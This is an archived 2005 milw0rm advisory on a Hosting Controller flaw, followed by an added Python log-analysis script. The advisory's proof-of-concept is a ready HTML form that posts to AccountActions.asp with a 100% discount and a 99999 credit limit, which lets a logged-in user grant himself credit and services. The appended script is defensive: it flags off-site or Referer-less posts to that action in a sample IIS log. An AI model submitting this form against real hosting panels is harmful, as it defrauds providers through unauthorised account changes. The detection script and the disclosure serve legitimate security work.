Hi, I'm Soroush Dalili from GSG (GrayHatz Security Group).

Title: Hosting Controller has a security bug in "AccountActions.asp" that lets an authenticated user change his/her credit and buy some services!
Version: 6.1 HotFix 2.1 and older
Developer url: hostingcontroller.com
Comment: Hosting Controller is an application to manage a host.

Exploit code as proof:
--------------------------------
GET CREDIT<br>Soroush Dalili from GSG<br>
<form action="http://[URL]/Admin/Accounts/AccountActions.asp?ActionType=UpdateCreditLimit" method="post">
<table>
  <tr> <td>Username:</td> <td><input type="text" name="UserName" value=""></td> </tr>
  <tr> <td>Description:</td> <td><input type="text" name="Description" value=""></td> </tr>
  <tr> <td>FullName:</td> <td><input type="text" name="FullName" value=""></td> </tr>
  <tr> <td>AccountDisabled 1,[blank]:</td> <td><input type="text" name="AccountDisabled" value=""></td> </tr>
  <tr> <td>UserChangePassword:</td> <td><input type="text" name="UserChangePassword" value=""></td> </tr>
  <tr> <td>PassCheck=TRUE,0:</td> <td><input type="text" name="PassCheck" value="0"></td> </tr>
  <tr> <td>New Password:</td> <td><input type="text" name="Pass1" value=""></td> </tr>
  <tr> <td>DefaultDiscount%:</td> <td><input type="text" name="DefaultDiscount" value="100"></td> </tr>
  <tr> <td>CreditLimit:</td> <td><input type="text" name="CreditLimit" value="99999"></td> </tr>
</table>
<br><input type="submit">
</form>
<hr><br>

# milw0rm.com [2005-07-10]
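
Added example (not part of the original advisory or Hosting Controller's code): a log check that flags POSTs to the advisory's UpdateCreditLimit action whose Referer is missing or off-site, as happens when the form above is submitted from outside the panel. The IIS W3C log layout, hosts and addresses are constructed, and treating a same-origin Referer as the legitimate case is an assumption.

```python
from urllib.parse import parse_qs, urlsplit

# Constructed IIS W3C log sample (hosts, paths other than the advisory's, and IPs are placeholders).
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status cs(Referer) cs-host
2005-07-11 09:14:02 192.0.2.10 POST /Admin/Accounts/AccountActions.asp ActionType=UpdateCreditLimit 200 http://panel.example.test/Admin/placeholder.asp panel.example.test
2005-07-11 09:20:41 198.51.100.7 POST /Admin/Accounts/AccountActions.asp ActionType=UpdateCreditLimit 200 - panel.example.test
2005-07-11 09:22:13 198.51.100.7 POST /admin/accounts/accountactions.asp actiontype=updatecreditlimit 302 http://other.example.net/credit.html panel.example.test:8080
2005-07-11 09:25:00 192.0.2.10 GET /Admin/Accounts/AccountActions.asp ActionType=UpdateCreditLimit 200 - panel.example.test
2005-07-11 09:26:30 203.0.113.5 POST /Admin/Accounts/AccountActions.asp ActionType=Other 200 - panel.example.test
"""

TARGET_STEM = "/admin/accounts/accountactions.asp"  # path from the advisory
TARGET_ACTION = "updatecreditlimit"                 # ActionType from the advisory

def suspicious_credit_updates(log_text):
    """Return (timestamp, client_ip, reason) for each flagged request."""
    fields, hits = [], []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]  # column order is declared by the log itself
            continue
        if not line.strip() or line.startswith("#") or not fields:
            continue
        row = dict(zip(fields, line.split()))
        # IIS/ASP match the path and query-string keys case-insensitively.
        query = parse_qs(row.get("cs-uri-query", "").lower())
        if (row.get("cs-method", "").upper() != "POST"
                or row.get("cs-uri-stem", "").lower() != TARGET_STEM
                or query.get("actiontype", [""])[0] != TARGET_ACTION):
            continue
        referer = row.get("cs(Referer)", "-")
        ref_host = urlsplit(referer).hostname if referer != "-" else None
        site_host = row.get("cs-host", "").lower().split(":")[0]
        if ref_host is None:
            reason = "missing-referer"
        elif ref_host != site_host:
            reason = "cross-origin-referer"
        else:
            continue  # submitted from a page on the panel itself
        hits.append((f"{row.get('date')} {row.get('time')}", row.get("c-ip"), reason))
    return hits

if __name__ == "__main__":
    for hit in suspicious_credit_updates(SAMPLE_LOG):
        print(*hit)
```

Referer is client-controlled, so this only surfaces unmodified form submissions; the handler still needs a server-side authorization check.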